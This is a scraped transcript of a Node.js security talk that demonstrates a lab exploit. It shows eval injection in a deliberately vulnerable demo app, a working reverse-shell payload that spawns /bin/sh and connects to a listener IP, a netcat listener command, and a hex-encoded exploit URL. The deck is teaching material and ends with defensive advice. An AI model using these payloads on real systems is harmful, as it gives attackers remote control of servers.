node js reverse shell
TRANSCRIPT
![Page 1: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/1.jpg)
NODE JS SECURITYVULNERABILITIES
![Page 2: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/2.jpg)
ABOUT MEMadhu Akula - Automation Security Ninja at Interested in Security & DevOpsNever ending learner!
@madhuakulaAppsecco
![Page 3: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/3.jpg)
WHAT IS NODE JS?
Node.js is an open-source, cross-platformruntime environment for developing server-
side Web applications.
Although Node.js is not a JavaScriptframework, many of its basic modules arewritten in JavaScript, and developers can
write new modules in JavaScript. Theruntime environment interprets JavaScript
using Google's V8 JavaScript engine.
wikipedia
![Page 4: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/4.jpg)
HELLO WORLD HTTP SERVER INNODE JS
var http = require('http');
var server = http.createServer(function(req, res) res.writeHead(200); res.end('Hello World'); ); server.listen(2000);
![Page 5: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/5.jpg)
WHY NODE JS SECURITY?A lot of the application are moving to Javascript, especially
with MEAN (Mongo-Express-Angular-Node) stack.
![Page 6: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/6.jpg)
HOW TO TEST NODE JS SECURITY?It's similar to the normal web application security and adds
additional checks for the Javascript vulnerabilities.
![Page 7: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/7.jpg)
DEMO TIME
![Page 8: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/8.jpg)
REVERSE SHELL ON A NODE.JSAPPLICATION BY @WIREMASK
POC SETUP
![Page 9: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/9.jpg)
VULNERABLE NODE JS CODE'use strict' const http = require('http'); const url = require('url'); const path = require('path');
const animalsJSON = path.join(__dirname, 'animals.json'); const animals = require(animalsJSON);
function requestHandler(req, res)
let urlParams = url.parse(req.url, true);
let queryData = urlParams.query;
res.writeHead(200, "ContentType": "application/json");
![Page 10: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/10.jpg)
ACCESS THE APPLICATIONhttp://localhost:3000/?name=do*
![Page 11: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/11.jpg)
IDENTIFICATIONThe stringToRegexp function is evaluating user input to
create a RegExp object and use it to find elements in anarray.
return eval(prefix + output + suffix); // we control output value
![Page 12: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/12.jpg)
We can insert our own Javascript code in the outputvariable and execute it. The stringToRegexp function
will escape some characters and the output value will beevaluated.
http://localhost:3000/?name=["./;require('util').log('Owned');//*"]
![Page 13: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/13.jpg)
EXPLOIT(function()
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "172.28.128.1", function()
![Page 14: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/14.jpg)
START NETCAT LISTENERnc lvp 8080
![Page 15: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/15.jpg)
SAMPLE URLhttp://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"
![Page 16: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/16.jpg)
HEX PAYLOAD CREATION USING PYTHON>>> payload = 'nodejs reverse shell Java Script code' >>> payload.encode('hex')
![Page 17: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/17.jpg)
FINAL URL WITH PAYLOADhttp://localhost:3000/?name=["./;eval(new Buffer('2866756e6374696f6e28297b20766172206e6574203d207265717569726528226e657422292c206370203d207265717569726528226368696c645f70726f6365737322292c207368203d2063702e737061776e28222f62696e2f7368222c205b5d293b2076617220636c69656e74203d206e6577206e65742e536f636b657428293b20636c69656e742e636f6e6e65637428383038302c20223137322e32382e3132382e31222c2066756e6374696f6e28297b20636c69656e742e706970652873682e737464696e293b2073682e7374646f75742e7069706528636c69656e74293b2073682e7374646572722e7069706528636c69656e74293b207d293b2072657475726e202f612f3b207d2928293b', 'hex').toString());//*"
![Page 18: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/18.jpg)
CHECK YOUR NETCAT LISTENER
![Page 19: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/19.jpg)
CONCLUSION
It's highly recommended to avoid using theeval function in a Javascript project. The
fix was rather simple, they started usingusing the RegExp object directly.
![Page 20: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/20.jpg)
WANT TO TRY YOUR YOURSELF?https://github.com/appsecco/vulnerable-apps
docker run p 3000:3000 d appsecco/nodereverseshell
![Page 21: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/21.jpg)
PLAYGROUND FOR NODEJSVULNERABILITIES
DAMN VULNERABLE NODE APPLICATIONAnsible Playbook & Docker
![Page 22: Node JS reverse shell](https://reader033.vdocuments.us/reader033/viewer/2022050614/58ec8d421a28ab94798b456b/html5/thumbnails/22.jpg)
NODE JS SECURITY REFERENCEShttps://www.npmjs.com/package/helmet
https://blog.risingstack.com/node-js-security-checklist/https://nodesecurity.io/resources
https://groups.google.com/forum/#!forum/nodejs-sec